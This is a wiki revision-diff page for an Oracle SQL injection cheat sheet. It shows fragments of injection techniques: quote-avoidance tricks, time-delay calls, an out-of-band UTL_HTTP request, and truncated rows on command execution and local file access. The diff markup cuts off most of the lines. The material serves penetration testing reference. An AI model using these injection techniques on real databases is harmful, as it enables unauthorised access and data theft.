hacking:sql_injection_cheat_sheet_oracle
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
hacking:sql_injection_cheat_sheet_oracle [2020/04/01 11:22] – peter | hacking:sql_injection_cheat_sheet_oracle [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 64: | Line 64: | ||
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 | SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 | ||
</ | </ | ||
- | |Avoiding Quotes|SELECT chr(65) || chr(66) FROM dual; -- returns AB| | + | |Avoiding Quotes|< |
|Time Delay|< | |Time Delay|< | ||
BEGIN DBMS_LOCK.SLEEP(5); | BEGIN DBMS_LOCK.SLEEP(5); | ||
Line 76: | Line 76: | ||
SELECT UTL_HTTP.REQUEST(' | SELECT UTL_HTTP.REQUEST(' | ||
</ | </ | ||
- | |Command Execution | | + | |Command Execution |< |
[[http:// | [[http:// | ||
Line 82: | Line 82: | ||
[[http:// | [[http:// | ||
</ | </ | ||
- | |Local File Access| | + | |Local File Access|< |
- | + | ||
[[http:// | [[http:// | ||
SELECT value FROM v$parameter2 WHERE name = ' | SELECT value FROM v$parameter2 WHERE name = ' | ||
Line 99: | Line 98: | ||
SYSTEM | SYSTEM | ||
SYSAUX | SYSAUX | ||
- | </ | + | </ |
---- | ---- |
hacking/sql_injection_cheat_sheet_oracle.1585740152.txt.gz · Last modified: 2020/07/15 09:30 (external edit)